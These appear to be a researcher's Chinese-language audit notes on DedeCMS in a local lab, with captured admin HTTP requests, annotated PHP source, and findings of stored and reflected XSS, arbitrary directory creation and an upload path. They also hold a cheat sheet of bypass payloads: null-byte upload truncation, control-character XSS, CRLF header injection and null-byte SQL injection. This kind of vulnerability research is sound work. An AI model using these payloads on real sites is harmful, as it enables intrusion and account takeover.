Cookie: menuitems=1_1%2C2_1%2C4_1%2C6_1%2C3_1%2C5_1; DedeUserID=1; DedeUserID__ckMd5=16f063afe3fbbf9a; DedeLoginTime=1781510727; DedeLoginTime__ckMd5=6a08ab93e9b82d93; lastCid=1; lastCid__ckMd5=16f063afe3fbbf9a; PHPSESSID=fkd4nmanosng3l7lnbsjmi6a0l; _csrf_name_63248f8b=e9f25d627db80db7c4882fffd5b6f2a0; _csrf_name_63248f8b__ckMd5=aa906259717f979b; ENV_GOBACK_URL=%2Fdede%2Fcontent_list.php%3Fchannelid%3D1%26cid%3D1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=4变量检查
php
dopost=save
&reid=15
&topid=12
&moresite=0
&siteurl=
&sitepath=
&issend=1&ishidden=0&channeltype=1&typename=%3Cxss%3E&sortrank=50&corank=0&nextdir=%7Bcmspath%7D%2Fa%2Fxiangguanziliao%2Fxiangguanjianjie%2F&typedir=d%3A%2F&referpath=parent&isdefault=1&defaultname=index.php&ispart=0&cross=0&crossid=&dfstyle=%7Bstyle%7D&tempindex=%7Bstyle%7D%2Findex_article.htm&templist=%7Bstyle%7D%2Flist_article.htm&temparticle=%7Bstyle%7D%2Farticle_article.htm&namerule=%7Btypedir%7D%2F%7BY%7D%2F%7BM%7D%7BD%7D%2F%7Baid%7D.html&namerule2=%7Btypedir%7D%2Flist_%7Btid%7D_%7Bpage%7D.html&seotitle=123&keywords=12&description=11&content=5555&imageField.x=39&imageField.y=9
php
Content-Length: 647
Origin: http://127.0.0.1:855
Connection: keep-alive
Referer: http://127.0.0.1:855/dede/catalog_add.php?id=15
Cookie: menuitems=1_1%2C2_1%2C4_1%2C6_1%2C3_1%2C5_1; lastCid=12; lastCid__ckMd5=2a6723e35d8f4eb8; PHPSESSID=fkd4nmanosng3l7lnbsjmi6a0l
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=4
dopost=save&reid=15&topid=12&moresite=0&siteurl=&sitepath=&issend=1&ishidden=0&channeltype=1&typename=%3Cxss%3E&sortrank=50&corank=0&nextdir=%7Bcmspath%7D%2Fa%2Fxiangguanziliao%2Fxiangguanjianjie%2F&typedir=d%3A%2F&referpath=parent&isdefault=1&defaultname=index.php&ispart=0&cross=0&crossid=&dfstyle=%7Bstyle%7D&tempindex=%7Bstyle%7D%2Findex_article.htm&templist=%7Bstyle%7D%2Flist_article.htm&temparticle=%7Bstyle%7D%2Farticle_article.htm&namerule=%7Btypedir%7D%2F%7BY%7D%2F%7BM%7D%7BD%7D%2F%7Baid%7D.html&namerule2=%7Btypedir%7D%2Flist_%7Btid%7D_%7Bpage%7D.html&seotitle=123&keywords=12&description=11&content=5555&imageField.x=39&imageField.y=9有过滤
调试
可能有任意目录写入
可以任意创建
php
else if($dopost=='save') {
$smalltypes = '';
//检查是否为空
if(empty($smalltype)) $smalltype = '';
//拼接
//$smalltype = ['A', 'B', 'C'];
//$result = join(',', $smalltype); // 输出: "A,B,C"
if(is_array($smalltype)) $smalltypes = join(',',$smalltype);
//isset 是 PHP 中用于检测变量是否已声明且值不为 NULL
//判断声明不是空
//sitepath=,可控
if(!isset($sitepath)) $sitepath = '';
//设置
if($topid==0 && $reid>0) $topid = $reid;
//可控,高级设置
if($ispart!=0) $cross = 0;
//过滤内容
$description = Html2Text($description,1);
//过滤
//标题没有限制
$keywords = Html2Text($keywords,1);
if($ispart != 2 )
{
//referpath=parent
//栏目的参照目录
if($referpath=='cmspath') $nextdir = '{cmspath}';
//判断字段,目录相对位置
if($referpath=='basepath') $nextdir = '';
//用拼音命名
//typedir=d%3A%2F
//根目录判断
//if(empty($upinyin)) $upinyin = 0;
if($upinyin==1 || $typedir=='')
{
//typename=%3Cxss%3E
//stripslashes() 是 PHP 中用于删除字符串中反斜杠转义字符的内置函数
//拼音处理,输出拼音
$typedir = GetPinyin(stripslashes($typename));
}
//%7Bcmspath%7D%2Fa%2Fxiangguanziliao%2Fxiangguanjianjie%2F&typedir=d%3A%2F
//可控
//d%3A%2F
//如果没有后面的可以写入文件
$typedir = $nextdir.'/'.$typedir;
//过滤
$typedir = preg_replace("#\/{1,}#", "/", $typedir);
}
//开启多站点时的设置(仅针对顶级栏目)
//栏目设置
if($reid==0 && $moresite==1)
{
//赋值
//可控
$sitepath = $typedir;
//检测二级网址
if($siteurl!='')
{
//校验
//这里xss看看
$siteurl = preg_replace("#\/$#", "", $siteurl);
if(!preg_match("#http:\/\/#i", $siteurl))
{
ShowMsg("你绑定的二级域名无效,请用(http://host)的形式!","-1");
exit();
}
if(preg_match("#".$cfg_basehost."#i", $siteurl))
{
ShowMsg("你绑定的二级域名与当前站点是同一个域,不需要绑定!","-1");
exit();
}
}
}
//创建目录
//关键
if($ispart != 2)
{
// $typedir = $nextdir.'/'.$typedir;
//$typedir = preg_replace("#\/{1,}#", "/", $typedir);
//拼接,可控一点点
//不影响
//cmspath/拼音
//$typedir的cmspath替换成$cfg_cmspath
$true_typedir = str_replace("{cmspath}", $cfg_cmspath, $typedir);
//压缩
// /出现一次或者多次,替换
//任意文件夹写入
//可能有
$true_typedir = preg_replace("#\/{1,}#", "/", $true_typedir);
if(!CreateDir($true_typedir))
{
ShowMsg("创建目录 {$true_typedir} 失败,请检查你的路径是否存在问题!","-1");
exit();
}
}
//存储
$in_query = "INSERT INTO `#@__arctype`(reid,topid,sortrank,typename,typedir,isdefault,defaultname,issend,channeltype,
tempindex,templist,temparticle,modname,namerule,namerule2,
ispart,corank,description,keywords,seotitle,moresite,siteurl,sitepath,ishidden,`cross`,`crossid`,`content`,`smalltypes`)
VALUES('$reid','$topid','$sortrank','$typename','$typedir','$isdefault','$defaultname','$issend','$channeltype',
'$tempindex','$templist','$temparticle','default','$namerule','$namerule2',
'$ispart','$corank','$description','$keywords','$seotitle','$moresite','$siteurl','$sitepath','$ishidden','$cross','$crossid','$content','$smalltypes')";
if(!$dsql->ExecuteNoneQuery($in_query))
{
ShowMsg("保存目录数据时失败,请检查你的输入资料是否存在问题!","-1");
exit();
}
//更新缓存
UpDateCatCache();
if($reid>0)
{
//设置
PutCookie('lastCid',GetTopid($reid),3600*24,'/');
}
ShowMsg("成功创建一个分类!","catalog_main.php");
exit();
}//End dopost==save
//获取从父目录继承的默认参数
if($dopost=='')
{
$channelid = 1;
$issend = 1;
$corank = 0;
$reid = 0;
$topid = 0;
$typedir = '';
$moresite = 0;
if($id>0)
{
$myrow = $dsql->GetOne(" SELECT tp.*,ch.typename AS ctypename FROM `#@__arctype` tp LEFT JOIN `#@__channeltype` ch ON ch.id=tp.channeltype WHERE tp.id=$id ");
$channelid = $myrow['channeltype'];
$issennd = $myrow['issend'];
$corank = $myrow['corank'];
$topid = $myrow['topid'];
$typedir = $myrow['typedir'];
}
//父栏目是否为二级站点
$moresite = empty($myrow['moresite']) ? 0 : $myrow['moresite'];
}
include DedeInclude('templets/catalog_add.htm');
php
function CreateDir($spath)
{
//function_exists() 是 PHP 中用于检测指定函数是否已定义的内置函数。
if(!function_exists('SpCreateDir'))
{
require_once(DEDEINC.'/inc/inc_fun_funAdmin.php');
}
//返回
return SpCreateDir($spath);
}
php
function SpCreateDir($spath)
{
global $cfg_dir_purview,$cfg_basedir,$cfg_ftp_mkdir,$isSafeMode;
if($spath=='')
{
return true;
}
$flink = false;
$truepath = $cfg_basedir;
$truepath = str_replace("\\","/",$truepath);
//explode 是 PHP 里用来把字符串按指定符号切分成数组的内置函数
$spaths = explode("/",$spath);
$spath = "";
foreach($spaths as $spath)
{
if($spath=="")
{
continue;
}
//去除字符串变量 $spath 首尾空白字符
$spath = trim($spath);
//添加
$truepath .= "/".$spath;
//是文件夹
//或者is_writeable是PHP编程语言中的文件系统函数,用于检测指定文件或目录是否可写
//一个true过滤
//可不可以写入,有没有
if(!is_dir($truepath) || !is_writeable($truepath))
{
if(!is_dir($truepath))
{
//创建
$isok = MkdirAll($truepath,$cfg_dir_purview);
}
else
{
$isok = ChmodAll($truepath,$cfg_dir_purview);
}
if(!$isok)
{
echo "创建或修改目录:".$truepath." 失败!<br>";
CloseFtp();
return false;
}
}
}
CloseFtp();
return true;
}
php
function MkdirAll($truepath,$mmode)
{
global $cfg_ftp_mkdir,$isSafeMode,$cfg_dir_purview;
if( $isSafeMode || $cfg_ftp_mkdir=='Y' )
{
return FtpMkdir($truepath, $mmode);
}
else
{
if(!file_exists($truepath))
{
mkdir($truepath, $cfg_dir_purview);
chmod($truepath, $cfg_dir_purview);
return true;
}
else
{
return true;
}
}
php
function GetPinyin($str, $ishead=0, $isclose=1)
{
global $cfg_soft_lang;
if(!function_exists('SpGetPinyin'))
{
//全局函数仅是inc_fun_funAdmin.php文件中函数的一个映射
require_once(DEDEINC."/inc/inc_fun_funAdmin.php");
}
if($cfg_soft_lang=='utf-8')
{
return SpGetPinyin(utf82gb($str), $ishead, $isclose);
}
else
{
return SpGetPinyin($str, $ishead, $isclose);
}
}
}
php
function Html2Text($str,$r=0)
{
//检查是否定义
//function_exists 是 PHP 的内置函数,用来检查某个函数是否已经定义
if(!function_exists('SpHtml2Text'))
{
require_once(DEDEINC."/inc/inc_fun_funString.php");
}
//第二个0
if($r==0)
{
return SpHtml2Text($str);
}
else
{
//过滤
//stripslashes 是 PHP 语言里专门用来去掉字符串中反斜杠(\)的函数
//防止xss
$str = SpHtml2Text(stripslashes($str));
//过滤
return addslashes($str);
}
}
}//正常:<script>alert(1)</script>
绕过:<scr\x09ipt>alert(1)</script>
绕过:<scr\x0aipt>alert(1)</script>
绕过:<scr\x0dipt>alert(1)</script>
最经典的一个:
```
文件上传:shell.php\x00.jpg
```
-
某些老版本 C 语言底层函数遇到 `\x00` 就认为字符串结束
-
后端校验看到 `.jpg` 放行
-
实际写文件时在 `\x00` 处截断,落地成 `shell.php`
适用场景:PHP < 5.3.4 的文件操作、老版本 Java 的 `File()` 构造
Tab `\x09` / 换行 `\x0a` / 回车 `\x0d`
XSS 绕过正则用:
```html
正常:<script>alert(1)</script>
绕过:<scr\x09ipt>alert(1)</script>
绕过:<scr\x0aipt>alert(1)</script>
绕过:<scr\x0dipt>alert(1)</script>
```
浏览器解析 HTML 时,标签名里的这些控制字符会被忽略,照样识别为 `<script>`。但正则 `/script/` 匹配不到 `scr\x09ipt`,就绕过去了。
还有属性值里插:
```html
<img src=x οnerrοr=aler\x09t(1)>
```
JavaScript 引擎在某些上下文也会忽略这些字符。
换行符绕 WAF / 正则
很多正则没加 `s` 修饰符(`.` 不匹配换行),所以:
```html
<script>
alert(1)</script>
```
正则 `/<script>(.*)<\/script>/` 如果没有 `s` 修饰符,`.` 匹配不到换行符,整个标签匹配失败,绕过。
回车换行 `\r\n` 做 HTTP 头注入(CRLF)
```
输入:xxx\r\nSet-Cookie: admin=1
```
如果服务端把用户输入拼进 HTTP 响应头:
```http
Location: xxx
Set-Cookie: admin=1
```
`\r\n` 在 HTTP 协议里是头部换行分隔符,你注入了一个新的响应头。
Unicode NULL `\u0000`
JSON / JavaScript 里的变体:
```json
{"name": "admin\u0000' OR 1=1-- -"}
```
某些后端语言解析 JSON 时保留 `\u0000`,传到 C 底层函数时被截断。
总结表
| 字符 | ASCII | 用途 | 典型场景 |
|---|---|---|---|
| `\x00` (NULL) | 0 | 字符串截断 | 文件上传、路径处理 |
| `\x09` (Tab) | 9 | 标签名/属性插入绕正则 | XSS |
| `\x0a` (LF) | 10 | 绕正则、CRLF 注入 | XSS、HTTP 头注入 |
| `\x0d` (CR) | 13 | 同上 | XSS、HTTP 头注入 |
| `\x0b` (垂直Tab) | 11 | 绕空格过滤 | SQL 注入(替代空格) |
| `\x0c` (换页符) | 12 | 绕空格过滤 | SQL 注入(替代空格) |
| `\x1b` (ESC) | 27 | 终端注入 | 日志注入、终端逃逸 |
你想写 <script>
< 被前面干掉了
你改用 <script>
这条正则把 < 和 > 删了
最终剩下 script(无害纯文本)
php
function SpHtml2Text($str)
{
//图片那种可以
$str = preg_replace("/<sty(.*)\\/style>|<scr(.*)\\/script>|<!--(.*)-->/isU","",$str);
$alltext = "";
$start = 1;
//strlen 是 PHP 里用来算字符串长度的基础函数,直接返回占用的字节数
for($i=0;$i<strlen($str);$i++)
{
//遍历
//可以是>不可以<
if($start==0 && $str[$i]==">")
{
$start = 1;
}
else if($start==1)
{
if($str[$i]=="<")
{
$start = 0;
//过滤成为空
$alltext .= " ";
}
//限制长度,防止截断
//ord() 函数用于获取字符串第一个字节的整数值(0-255)
else if(ord($str[$i])>31)
{
//字符
$alltext .= $str[$i];
}
}
}
//替换
$alltext = str_replace(" "," ",$alltext);
//过滤xss
//匹配&
//第一个捕获组,匹配;&一切
$alltext = preg_replace("/&([^;&]*)(;|&)/","",$alltext);
//空格压缩
$alltext = preg_replace("/[ ]+/s"," ",$alltext);
return $alltext;
}
?>
php
if($topid==0 && $reid>0) $topid = $reid;重来思路
增加栏目,更改栏目
先改
sql没有用
php
POST /dede/catalog_add.php HTTP/1.1
Host: 127.0.0.1:855
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:151.0) Gecko/20100101 Firefox/151.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 488
Origin: http://127.0.0.1:855
Connection: keep-alive
Referer: http://127.0.0.1:855/dede/catalog_add.php?id=12
Cookie: menuitems=1_1%2C2_1%2C4_1%2C6_1%2C3_1%2C5_1; lastCid=13; lastCid__ckMd5=d8c36d33c7eb08fc; PHPSESSID=fkd4nmanosng3l7lnbsjmi6a0l; _csrf_name_63248f8b=d1561624703d065da155a70bcb4a3a54; _csrf_name_63248f8b__ckMd5=ade47f24deac3395; DedeUserID=1; DedeUserID__ckMd5=16f063afe3fbbf9a; DedeLoginTime=1781667693; DedeLoginTime__ckMd5=3ec0d1b537ae6e7b; ENV_GOBACK_URL=%2Fdede%2Fcontent_list.php%3Fchannelid%3D1%26cid%3D12
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=4
dopost=save&reid=12&topid=0&moresite=0&siteurl=http%3A%2F%2F%3Cscript%3Ealert%28&sitepath=%7Bcmspath%7D%2Fa%2Fxiangguanziliao&issend=1&ishidden=0&channeltype=1&typename=1&sortrank=50&corank=0&nextdir=%7Bcmspath%7D%2Fa%2Fxiangguanziliao%2F&typedir=2&referpath=parent&isdefault=1&defaultname=index.html3&ispart=1&cross=0&crossid=&dfstyle=%7Bstyle%7D&tempindex=7&templist=8&temparticle=9&namerule=10&namerule2=11&seotitle=4&keywords=5&description=6&content=13&imageField.x=24&imageField.y=13dopost=save控制
XSS,任意目录创建,SQL拼接语句错误(?)
seotitle 没有过滤,这个估计不显示,所以无效,crossid大概一样
文件xss大法也没有用。
1111111
defaultname没有过滤
namerule2,没有过滤
php
else if($dopost=='save') {
$smalltypes = '';
//小型,不可控
if(empty($smalltype)) $smalltype = '';
if(is_array($smalltype)) $smalltypes = join(',',$smalltype);
//sitepath=%7Bcmspath%7D%2Fa%2Fxiangguanziliao
//上级目录判断,可控,xss?
if(!isset($sitepath)) $sitepath = '';
//topid顶部id
//reid,本文章id
//可控
//没有过滤
if($topid==0 && $reid>0) $topid = $reid;
//ispart=1
//开关
if($ispart!=0) $cross = 0;
//过滤关键字栏目描述
$description = Html2Text($description,1);
$keywords = Html2Text($keywords,1);
//检查栏目属性
if($ispart != 2 )
{
//栏目的参照目录
//相对位置设置
//referpath=parent
//上级目录判断赋值
if($referpath=='cmspath') $nextdir = '{cmspath}';
if($referpath=='basepath') $nextdir = '';
//用拼音命名
//开关
if($upinyin==1 || $typedir=='')
{
$typedir = GetPinyin(stripslashes($typename));
}
//直接拼接
//文件保存目录,名字
//都可以改
//nextdir=%7Bcmspath%7D%2Fa%2Fxiangguanziliao%2F
$typedir = $nextdir.'/'.$typedir;
//过滤
$typedir = preg_replace("#\/{1,}#", "/", $typedir);
}
//开启多站点时的设置(仅针对顶级栏目)
if($reid==0 && $moresite==1)
{
//设置位置
$sitepath = $typedir;
//检测二级网址
if($siteurl!='')
{
//去掉末尾斜杠
//$最末尾的/去掉
$siteurl = preg_replace("#\/$#", "", $siteurl);
//preg_match 是 PHP 中用来做正则表达式匹配的函数,在字符串里搜索符合特定模式的内容
//判断有没有http不区分大小写
if(!preg_match("#http:\/\/#i", $siteurl))
{
ShowMsg("你绑定的二级域名无效,请用(http://host)的形式!","-1");
exit();
}
//检查栏目属性
if(preg_match("#".$cfg_basehost."#i", $siteurl))
{有没有特定的东西
ShowMsg("你绑定的二级域名与当前站点是同一个域,不需要绑定!","-1");
exit();
}
}
}
//创建目录
if($ispart != 2)
{
//xss?
//$cfg_cmspath./typeder拼接,任意创建
//str_replace(查找值,替换值,目标字符串)
$true_typedir = str_replace("{cmspath}", $cfg_cmspath, $typedir);
$true_typedir = preg_replace("#\/{1,}#", "/", $true_typedir);
if(!CreateDir($true_typedir))
{
ShowMsg("创建目录 {$true_typedir} 失败,请检查你的路径是否存在问题!","-1");
exit();
}
}
$in_query = "INSERT INTO `#@__arctype`(reid,topid,sortrank,typename,typedir,isdefault,defaultname,issend,channeltype,
tempindex,templist,temparticle,modname,namerule,namerule2,
ispart,corank,description,keywords,seotitle,moresite,siteurl,sitepath,ishidden,`cross`,`crossid`,`content`,`smalltypes`)
VALUES('$reid','$topid','$sortrank','$typename','$typedir','$isdefault','$defaultname','$issend','$channeltype',
'$tempindex','$templist','$temparticle','default','$namerule','$namerule2',
'$ispart','$corank','$description','$keywords','$seotitle','$moresite','$siteurl','$sitepath','$ishidden','$cross','$crossid','$content','$smalltypes')";
//这里有过滤,无法注入(调试)
if(!$dsql->ExecuteNoneQuery($in_query))
{
ShowMsg("保存目录数据时失败,请检查你的输入资料是否存在问题!","-1");
exit();
}
UpDateCatCache();
if($reid>0)
{
PutCookie('lastCid',GetTopid($reid),3600*24,'/');
}
ShowMsg("成功创建一个分类!","catalog_main.php");
exit();
}//End dopost==save几乎没有
外部引用xss
成功(远程xss)
后台xss了
任意文件夹创建(不说了)
常规选项看完了,看高级选项。
不知道为什么卡卡的之后再说吧。
php
GET /include/dialog/select_templets.php?f=form1.tempindex&activepath=%2Ftemplets%2Fdefault HTTP/1.1
Host: 127.0.0.1:855
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:151.0) Gecko/20100101 Firefox/151.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://127.0.0.1:855/include/dialog/select_templets.php?f=form1.tempindex&activepath=%2..%2Flurd
Cookie: lastCid=12; lastCid__ckMd5=2a6723e35d8f4eb8; PHPSESSID=fkd4nmanosng3l7lnbsjmi6a0l; _csrf=5f474eabd0ba2790c1f3762c23bfcad649d9fb559f022f741e5c52b4bca5bb7aa%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22Bf7noc_vjFanw3AxfOeC01isxKx8wxp2%22%3B%7D; _csrf_name_63248f8b=6b18aea9b36f9f2e617747874a08d6f1; _csrf_name_63248f8b__ckMd5=a027c052e8089df1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
路径跳跃(失败)
绝对有限制
xss成功
$f伪造头
就是伪造请求投那种。
由于f可控,所以我可以转行让这个f变成请求头,然后我伪造请求头。
poc
xss 失败,这里要用路径加载
绝对路径遍历失败
直接有拼接
php
require_once(dirname(__FILE__)."/config.php");
//不让穿越
//$activepath = str_replace("..", "", $activepath);
//过滤..,为空
//activepath=%2Ftemplets%2Fdefault
if(empty($activepath))
{
$activepath = '';
}
//后缀
$cfg_txttype = 'htm|html|tpl|txt|dtp';
//过滤,str_replace 是 PHP 中用于字符串替换的内置函数
//过滤替换
$activepath = str_replace('.', '', $activepath);
//纠正格式
$activepath = preg_replace("#\/{1,}#", '/', $activepath);
//获取模板路径
$templetdir = $cfg_templets_dir;
//比较长度
if(strlen($activepath) < strlen($templetdir))
{
//默认赋值?
$activepath = $templetdir;
}
//拼接路径
$inpath = $cfg_basedir.$activepath;
//跳跃
$activeurl = '..'.$activepath;
//检查文件夹
if (!is_dir($inpath) )
{
die('No Exsits Path');
}
//如果f是空
if(empty($f))
{
$f='form1.enclosure';
}
if(empty($comeback))
{
//?可控
$comeback = '';
}
?>可能xss
反射xss,dos
php
function ReturnValue(reimg)
{
window.opener.document.<?php echo $f?>.value=reimg;
if(document.all) window.opener=true;
window.close();
}
php
<tr>
<td class='linerow' bgcolor='#F9FBF0'>
<a href=\"javascript:ReturnValue('$reurl');\" $lstyle><img src=img/txt.gif border=0 width=16 height=16 align=absmiddle>$file</a>
</td>
xss失败
php
<?php
//在 PHP 中,dir() 是一个用于以面向对象方式打开目录并返回 Directory 类实例的函数。
$dh = dir($inpath);
$ty1="";
$ty2="";
//读取文件
//$dh->read() 是 PHP 中用于从目录句柄读取下一个条目(文件名或子目录名)的方法,属于 Directory 类的成员函数
//循环读取
while($file = $dh->read()) {
//-----计算文件大小和创建时间
//固定内容拼接
//$inpath = $cfg_basedir.$activepath;
//显示逻辑
//不是。,不是。。,不是目录
//$inpath = $cfg_basedir.$activepath;
if($file!="." && $file!=".." && !is_dir("$inpath/$file")){
//大小
$filesize = filesize("$inpath/$file");
//显示单位
$filesize = $filesize / 1024;
if($filesize != "")
//文件太小
if($filesize < 0.1)
{
//分割.填充变量,可控一点点
@list($ty1,$ty2) = split("\.", $filesize);
//截取0~2剩下拼接
$filesize=$ty1.".".substr($ty2, 0, 2);
} else {
@list($ty1,$ty2) = split("\.", $filesize);
$filesize=$ty1.".".substr($ty2, 0, 1);
}
$filetime = filemtime("$inpath/$file");
//获取时间
$filetime = MyDate("Y-m-d H:i:s", $filetime);
}
//------判断文件类型并作处理
//这行代码的意思是:在循环遍历目录时,如果当前项是"当前目录"(.),则跳过本次剩余操作,直接进入下一次循环。
//continue停止
if($file == ".") continue;
else if($file == "..")
{
//空
if($activepath == "") continue;
//过滤,整理
//[\/]匹配/,[^\/]*多个不是/的字符
//$从结尾开始
//末尾开始匹配
//漏洞(小bug)这样如果get的后面有/,他就不能跳转上一行,要点击2次
$tmp = preg_replace("#[\/][^\/]*$#", "", $activepath);
//拼接
//直接拼接
$line = "\n<tr>
//固定
//urlencode编码规范
<td class='linerow'> <a href='select_templets.php?f=$f&activepath=".urlencode($tmp)."'><img src=img/dir2.gif border=0 width=16 height=16 align=absmiddle>上级目录</a></td>
//显示
<td colspan='2' class='linerow'> 当前目录:$activepath</td>
</tr>\r\n";
echo $line;
}
else if(is_dir("$inpath/$file"))
{
if(preg_match("#^_(.*)$#i", $file)) continue; #屏蔽FrontPage扩展目录和linux隐蔽目录
if(preg_match("#^\.(.*)$#i", $file)) continue;
$line = "\n<tr>
<td bgcolor='#F9FBF0' class='linerow'>
<a href=select_templets.php?f=$f&activepath=".urlencode("$activepath/$file")."><img src=img/dir.gif border=0 width=16 height=16 align=absmiddle>$file</a>
</td>
<td class='linerow'>-</td>
<td bgcolor='#F9FBF0' class='linerow'>-</td>
</tr>";
echo "$line";
} else if(preg_match("#\.(htm|html)#i", $file))
{
if($file==$comeback) $lstyle = " style='color:red' ";
else $lstyle = "";
$reurl = "$activeurl/$file";
$reurl = preg_replace("#\.\.#", "", $reurl);
$reurl = preg_replace("#".$templetdir."\/#", "", $reurl);
$line = "\n<tr>
<td class='linerow' bgcolor='#F9FBF0'>
<a href=\"javascript:ReturnValue('$reurl');\" $lstyle><img src=img/htm.gif border=0 width=16 height=16 align=absmiddle>$file</a>
</td>
<td class='linerow'>$filesize KB</td>
<td align='center' class='linerow' bgcolor='#F9FBF0'>$filetime</td>
</tr>";
echo "$line";
} else if(preg_match("#\.(css)#i", $file))
{
if($file==$comeback) $lstyle = " style='color:red' ";
else $lstyle = "";
$reurl = "$activeurl/$file";
$reurl = preg_replace("#\.\.#", "", $reurl);
$reurl = preg_replace("#".$templetdir."/#", "", $reurl);
$line = "\n<tr>
<td class='linerow' bgcolor='#F9FBF0'>
<a href=\"javascript:ReturnValue('$reurl');\" $lstyle><img src=img/css.gif border=0 width=16 height=16 align=absmiddle>$file</a>
</td>
<td class='linerow'>$filesize KB</td>
<td align='center' class='linerow' bgcolor='#F9FBF0'>$filetime</td>
</tr>";
echo "$line";
} else if(preg_match("#\.(js)#i", $file))
{
if( $file == $comeback ) $lstyle = " style='color:red' ";
else $lstyle = "";
$reurl = "$activeurl/$file";
$reurl = preg_replace("#\.\.#", "", $reurl);
$reurl = preg_replace("#".$templetdir."\/#", "", $reurl);
$line = "\n<tr>
<td class='linerow' bgcolor='#F9FBF0'>
<a href=\"javascript:ReturnValue('$reurl');\" $lstyle><img src=img/js.gif border=0 width=16 height=16 align=absmiddle>$file</a>
</td>
<td class='linerow'>$filesize KB</td>
<td align='center' class='linerow' bgcolor='#F9FBF0'>$filetime</td>
</tr>";
echo "$line";
} else if(preg_match("#\.(jpg)#i", $file))
{
if($file==$comeback) $lstyle = " style='color:red' ";
else $lstyle = "";
$reurl = "$activeurl/$file";
$reurl = preg_replace("#\.\.#", "", $reurl);
$reurl = preg_replace("#".$templetdir."\/#", "", $reurl);
$line = "\n<tr>
<td class='linerow' bgcolor='#F9FBF0'>
<a href=\"javascript:ReturnValue('$reurl');\" $lstyle><img src=img/jpg.gif border=0 width=16 height=16 align=absmiddle>$file</a>
</td>
<td class='linerow'>$filesize KB</td>
<td align='center' class='linerow' bgcolor='#F9FBF0'>$filetime</td>
</tr>";
echo "$line";
} else if(preg_match("#\.(gif|png)#i", $file))
{
if($file==$comeback) $lstyle = " style='color:red' ";
else $lstyle = "";
$reurl = "$activeurl/$file";
$reurl = preg_replace("#\.\.#", "", $reurl);
$reurl = preg_replace("#".$templetdir."\/#", "", $reurl);
$line = "\n<tr>
<td class='linerow' bgcolor='#F9FBF0'>
<a href=\"javascript:ReturnValue('$reurl');\" $lstyle><img src=img/gif.gif border=0 width=16 height=16 align=absmiddle>$file</a>
</td>
<td class='linerow'>$filesize KB</td>
<td align='center' class='linerow' bgcolor='#F9FBF0'>$filetime</td>
</tr>";
echo "$line";
}
else if(preg_match("#\.(txt)#i", $file))
{
if($file==$comeback) $lstyle = " style='color:red' ";
else $lstyle = "";
$reurl = "$activeurl/$file";
$reurl = preg_replace("#\.\.#", "", $reurl);
$reurl = preg_replace("#".$templetdir."\/#", "", $reurl);
$line = "\n<tr>
<td class='linerow' bgcolor='#F9FBF0'>
<a href=\"javascript:ReturnValue('$reurl');\" $lstyle><img src=img/txt.gif border=0 width=16 height=16 align=absmiddle>$file</a>
</td>
<td class='linerow'>$filesize KB</td>
<td align='center' class='linerow' bgcolor='#F9FBF0'>$filetime</td>
</tr>";
echo "$line";
}
}//End Loop
$dh->close();
?>
<!-- 文件列表完 -->
<tr>
<td colspan='3' bgcolor='#E8F1DE'>
<table width='100%'>
<form action='select_templets_post.php' method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='<?php echo $activepath?>'>
<input type='hidden' name='f' value='<?php echo $f?>'>
<input type='hidden' name='job' value='upload'>
<tr>
<td background="img/tbg.gif" bgcolor="#99CC00">
上 传: <input type='file' name='uploadfile' style='width:320px'>
改名:<input type='text' name='filename' value='' style='width:100px'>
<input type='submit' name='sb1' value='确定'>
</td>
</tr>
</form>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</body>
</html>
php
$tmp = preg_replace("#[\/][^\/]*$#", "", $activepath);
//返回上级目录的代码这里
上传(文件上传),读取,任意文件上传。
php
POST /include/dialog/select_templets_post.php HTTP/1.1
Host: 127.0.0.1:855
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:151.0) Gecko/20100101 Firefox/151.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=----geckoformboundaryba800d3139c7bd02fd29544a1befd05b
Content-Length: 30016283
Origin: http://127.0.0.1:855
Connection: keep-alive
Referer: http://127.0.0.1:855/include/dialog/select_templets.php?f=x;&activepath=%2Ftemplets
Cookie: lastCid=12; lastCid__ckMd5=2a6723e35d8f4eb8; PHPSESSID=rd55dnket3kjd3g40qb6dnrqdi; DedeUserID=1; DedeUserID__ckMd5=16f063afe3fbbf9a; DedeLoginTime=1781760038; DedeLoginTime__ckMd5=113970d3fd25fe05
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
------geckoformboundaryba800d3139c7bd02fd29544a1befd05b
Content-Disposition: form-data; name="activepath"
/templets
------geckoformboundaryba800d3139c7bd02fd29544a1befd05b
Content-Disposition: form-data; name="f"
x;
------geckoformboundaryba800d3139c7bd02fd29544a1befd05b
Content-Disposition: form-data; name="job"
upload
